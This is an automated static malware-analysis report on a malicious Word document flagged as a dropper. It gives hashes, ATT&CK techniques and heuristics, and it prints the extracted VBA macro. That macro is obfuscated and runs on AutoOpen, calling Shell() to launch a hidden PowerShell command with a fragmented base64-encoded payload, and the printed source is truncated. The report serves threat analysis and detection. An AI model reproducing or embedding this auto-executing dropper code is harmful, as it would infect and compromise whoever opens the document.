Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 606cce8650cded12…

MALICIOUS

Office (OLE)

108.0 KB Created: 2018-05-30 21:38:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: b3211693c684c0cc3eb58251b12685bd SHA-1: d9ecd9614d7b1c42a5684e645ad2fa8829325d7f SHA-256: 606cce8650cded12f8489261b7938649a837e67a6da918def8bbbc0be6a6c3b9
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers a Shell() call, which is highly indicative of downloading and executing a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent' further supports this dropper functionality. No specific family could be identified.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6567439-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6567439-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17417 bytes
SHA-256: 9fbea150be9ddb94c2d76f30858ed3c9d873572e70a4703b33e912c2e390fc99
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "acQGhGswzVn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uKATZzc()
On Error Resume Next
IjXEAu = Atn(58429 * CInt(7921) + 54929 - 76099)
KBSHr = 56301 + _
Log(86018) - CPvYXs / Atn(10094) / UNwQXb / zoBYp
MiYIFO = Atn(78833 * CInt(71392) + 56421 - 57740)
BIsON = 14238 + _
Log(99740) - uwJqi / Atn(43485) / iBTTqE / wqlWQ
uKATZzc = WoSzmR + lIRjE + tOLGlC + wlpBDUSvQ + rfNRi + dmjdw + oFJbjiw + acNGjotZHM + hSovdX + jThqQL
dQMrj = Atn(80990 * CInt(28924) + 28791 - 68734)
ljBMuk = 4301 + _
Log(76084) - mTjnRJ / Atn(75633) / wKBcq / iiikSH
End Function
Sub Autoopen()
On Error Resume Next
HXwPhm = Atn(79345 * CInt(84162) + 17639 - 26456)
wbizzc = 89974 + _
Log(64195) - mQEiIu / Atn(79904) / iPAjj / iwhXj
hAENkvA (uKATZzc)
wLpwN = Atn(59131 * CInt(28645) + 25493 - 69832)
BplLBq = 35937 + _
Log(31658) - mzVNt / Atn(26103) / RVzAQ / KKwab
End Sub
Function hAENkvA(zDiQplJLmZ)
On Error Resume Next
Uijcj = Atn(86647 * CInt(26830) + 20718 - 96841)
EniRQ = 94683 + _
Log(50001) - wvjJNt / Atn(26501) / UzibMb / LvcGU
nHcqJOZs = zWCUSDQrhn + Chr(vbKeyP) + YoSoOcPVU
UfCGwR = Atn(22764 * CInt(43744) + 98004 - 76491)
kVcfY = 22017 + _
Log(32637) - OzYQjX / Atn(16307) / YTVoqF / dQjCQc
zNXCEpbrGb = QYoDUw + Shell(lwjuXGA + nHcqJOZs + pnchwEXBzIi + zDiQplJLmZ + NOozaLX, vbHide)
MVJQq = Atn(82667 * CInt(98092) + 68900 - 74741)
LTGnwO = 43430 + _
Log(66902) - nnDdzW / Atn(59786) / wPrIAK / mCHPj
End Function



Attribute VB_Name = "iojkcWwBj"
Function WoSzmR()
On Error Resume Next
CkqWR = Atn(32250 * CInt(75904) + 33522 - 10190)
twfwL = 76141 + _
Log(85308) - bopfbE / Atn(60207) / EQmzE / lvAhq
zoDmITAH = "owersHeLL -W" + "inDow" + "sTyle hidden -e" + " IAAmACgAIAA" + "kAFMAaA" + "BlAEwATA" + "BpAEQAWwAx"
TQluG = Atn(36143 * CInt(84765) + 98353 - 7522)
AjRMLb = 48827 + _
Log(44376) - mrQMW / Atn(60003) / AlMjv / wiXKDv
hjYwtwzrFZM = "AF0AKw" + "AkAFMAaABFAGwA" + "TABJA" + "GQAWwAxA" + "DMAXQArACc" + "AeAAn"
IMjwW = Atn(31947 * CInt(11083) + 61276 - 84838)
KWdYES = 5176 + _
Log(7658) - OzRGm / Atn(39739) / WjjpAY / wAaLTp
tZPthYw = "ACkAKAAgACg" + "AKAAiAHsANAA" + "5AH0AewA5ADMA" + "fQB7ADUA" + "fQB7ADE" + "AMAA5AH0Ae" + "wA4ADYAfQB7ADMA"
ZbInC = Atn(24310 * CInt(34941) + 9882 - 86098)
UGojZ = 82465 + _
Log(10021) - ckuWwC / Atn(93962) / siXdGi / IpXJT
lKzfRtjjk = "NgB9AHsAN" + "AA1AH0AewAyAD" + "QAfQB7ADIAN" + "gB9AHsAOAA1A" + "H0AewAy" + "ADcAf" + "QB7ADUA" + "MQB9AHsAMQAw" + "ADUAfQB7ADgAOAB"
ITRqSV = Atn(87943 * CInt(69183) + 94156 - 48529)
VRrEM = 6491 + _
Log(59769) - qQTnh / Atn(29873) / lsfrC / mJURcf
uwsTA = "9AHsAMgAxAH0Ae" + "wA4ADEAfQB7AD" + "IAOQB9" + "AHsAMQA0AH" + "0AewA0ADcAfQB7A" + "DUANwB9AHs"
hDCvFO = Atn(14776 * CInt(78682) + 82740 - 18550)
msDcTo = 62220 + _
Log(69741) - IjBEFX / Atn(53853) / HXnjYA / nOXhS
nRXTO = "AMQAzAH" + "0AewA2" + "ADEAfQB7ADEAM" + "AAzAH0A" + "ewAyADUAf" + "QB7ADUANgB9AH" + "sAMwA" + "xAH0AewA3AH0"
VuijF = Atn(19214 * CInt(58785) + 19580 - 81421)
ksDVzB = 95747 + _
Log(81409) - mYhTWN / Atn(26529) / ioFQwR / npSVA
jzwqnr = "AewA3ADA" + "AfQB7ADYAfQB7A" + "DQAMwB9AHsA" + "OAA0AH0A" + "ewA5A" + "DEAfQB7A" + "DEAMAA4" + "AH0AewAyAD" + "MAfQB7ADk" + "ANgB9AHsANgA"
zZRrC = Atn(82946 * CInt(39371) + 59738 - 52671)
Qhzjjn = 52206 + _
Log(24352) - rSAVl / Atn(30016) / akiIjc / VozPbT
UaLpf = "1AH0AewA0ADAA" + "fQB7AD" + "YAMwB9AHsANAA2A" + "H0AewAxADA" + "AMQB9AHs"
tMCCo = Atn(66846 * CInt(98475) + 71039 - 69264)
NFzIuw = 6115 + _
Log(62082) - QQkwSC / Atn(76742) / drkYzt / wGzTw
ofQAOXTKw = "AMgAwAH0Ae" + "wA4ADI" + "AfQB7A" + "DMAMwB9AHsAMQA" + "xADEAf" + "QB7ADUAOQB9AHsA" + "MwA3AH0" + "AewAzA" + "DkAfQ"
npAiud = Atn(57012 * CInt(64597) + 51688 - 84596)
jzDFJP = 68976 + _
Log(99433) - rVtzb / Atn(27992) / zKozj / vdakOY
iQXIVwnUwQ = "B7ADk" + "AOAB9A" + "HsAMgB9AH" + "sANQA4AH0Ae" + "wA3ADIAfQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.